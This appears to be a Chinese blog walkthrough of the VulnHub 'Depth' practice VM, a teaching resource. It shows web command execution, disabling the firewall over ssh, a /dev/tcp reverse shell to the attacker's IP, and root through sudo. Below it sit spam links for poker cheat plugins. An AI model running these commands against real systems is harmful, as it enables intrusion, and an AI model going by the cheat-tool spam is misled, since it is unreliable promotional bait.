【vulnhub】Depth靶机
创始人
2024-11-13 03:41:18
0

靶机安装

下载地址:https://download.vulnhub.com/depth/DepthB2R.ova

运行环境:VMware运行该虚拟机

信息收集

靶机IP发现

nmap 192.168.93.0/24

端口扫描

nmap -A 192.168.93.154 -p-

只开起了8080端口

进行目录扫描8080端口

dirsearch -u http://192.168.93.154:8080

有一个目录/test.jsp

IP网址访问

翻译过后为

后面拼接/test.jsp

翻译过后

提示我们输入 ls -l /tmp 测试一下

存在系统命令执行漏洞,进行利用,反弹shell尝试失败

漏洞利用

ls -l /home 查看到home目录内容,发现bill用户

输入ps aux,找出带有 “ps aux”的正在运行的进程,选项“ aux ”会打印系统中所有正在运行的进程。我们发现 sshd 服务正在使用中,但访问可能受到限制,nmap刚刚没有扫描出ssh的端口,可能存在防火墙。

尝试关闭防火墙

#尝试关闭防火墙 ssh bill@localhost sudo ufw disable

再次执行反弹shell

ssh bill@localhost bash -i >& /dev/tcp/192.168.93.130/8787 0>&1

获取shell成功

提权

尝试sudo提权

sudo -l,发现所有用户(ALL)都有sudo权限,

直接 sudo su 命令

查看flag文件

上一篇:鸿蒙(HarmonyOS)项目方舟框架(ArkUI)之RichText组件

下一篇:两分钟了解!wpk透视软件网站(透视)wepoker确实有挂(有挂指点)

相关内容

热门资讯

透视规律!wepoker有没有... 透视规律!wepoker有没有插件,wejoker辅助软件视频(本来是有挂)1、每一步都需要思考,不...
透视好友!aapoker辅助器... 透视好友!aapoker辅助器怎么用(透视)能控制牌(果然真的有挂)1、每一步都需要思考,不同水平的...
透视好友!wepoker分析,... 透视好友!wepoker分析,wepoker有辅助工具吗(真是有挂);1、这是跨平台的wepoker...
透视软件!aapoker ai... 透视软件!aapoker ai插件(透视)透视脚本(一贯真的有挂)1)aapoker ai插件辅助挂...
透视规律!wepoker私人局... 透视规律!wepoker私人局俱乐部辅助,poker辅助器免费安装(确实真的有挂)1、超多福利:超高...
透视智能ai!aapoker辅... 透视智能ai!aapoker辅助器是真的吗(透视)破解侠是真的(竟然真的是有挂)1、全新机制【aap...
透视插件!wejoker辅助脚... 透视插件!wejoker辅助脚本,wepoker透视脚本免费下载pc(都是是有挂);wepoker透...
透视能赢!aapoker公共底... 透视能赢!aapoker公共底牌(透视)辅助(切实是有挂)1)aapoker公共底牌辅助挂:进一步探...
透视讲解!wepoker怎么挂... 透视讲解!wepoker怎么挂飞机,wepoker透视器免费(竟然有挂)一、wepoker怎么挂飞机...
透视有挂!aapoker安装包... 透视有挂!aapoker安装包怎么使用(透视)可以拿好牌(一贯真的是有挂)1)aapoker安装包怎...